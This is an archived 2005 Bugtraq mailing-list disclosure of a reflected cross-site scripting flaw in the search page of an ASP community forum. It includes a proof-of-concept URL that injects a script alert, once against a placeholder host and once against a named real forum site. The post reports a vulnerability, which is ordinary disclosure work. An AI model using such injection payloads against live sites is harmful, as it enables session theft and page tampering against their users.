XSS IN Community forum

abducter_minds_at_yahoo.com
Date: 06/28/05

Next message: bugtraq_at_sys-security.com: "Whitepaper release: Risks of Passive Network Discovery Systems"

Previous message: tmolamusa_at_optonline.net: "Weboot Window Washer Version 6.02.410 Will erase files from your PC"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 27 Jun 2005 23:30:17 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is) there is aproplem in Community forum
community forum make by asp
i found a xss in search
when we typed
http://www.victim.com/forum/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><b%20a=a%20&f=&u=
EXAMPLE
http://forums.asp.net/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><b%20a=a%20&f=&u=

it will make a xss

credit

abducter_minds@yahoo.com
all ARAB { EGYPT }

Next message: bugtraq_at_sys-security.com: "Whitepaper release: Risks of Passive Network Discovery Systems"

Previous message: tmolamusa_at_optonline.net: "Weboot Window Washer Version 6.02.410 Will erase files from your PC"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Absolute Products the Best for ASP!
... products for easy integration within ASP pages. ... community forum to support the products on my site. ...
(microsoft.public.inetserver.asp.general)
Absolute Products the Best for ASP!
... products for easy integration within ASP pages. ... community forum to support the products on my site. ...
(microsoft.public.inetserver.asp.components)
Absolute Products the Best for ASP!
... products for easy integration within ASP pages. ... community forum to support the products on my site. ...
(microsoft.public.dotnet.framework.aspnet)
Absolute Products the Best for ASP!
... products for easy integration within ASP pages. ... community forum to support the products on my site. ...
(microsoft.public.inetserver.asp.db)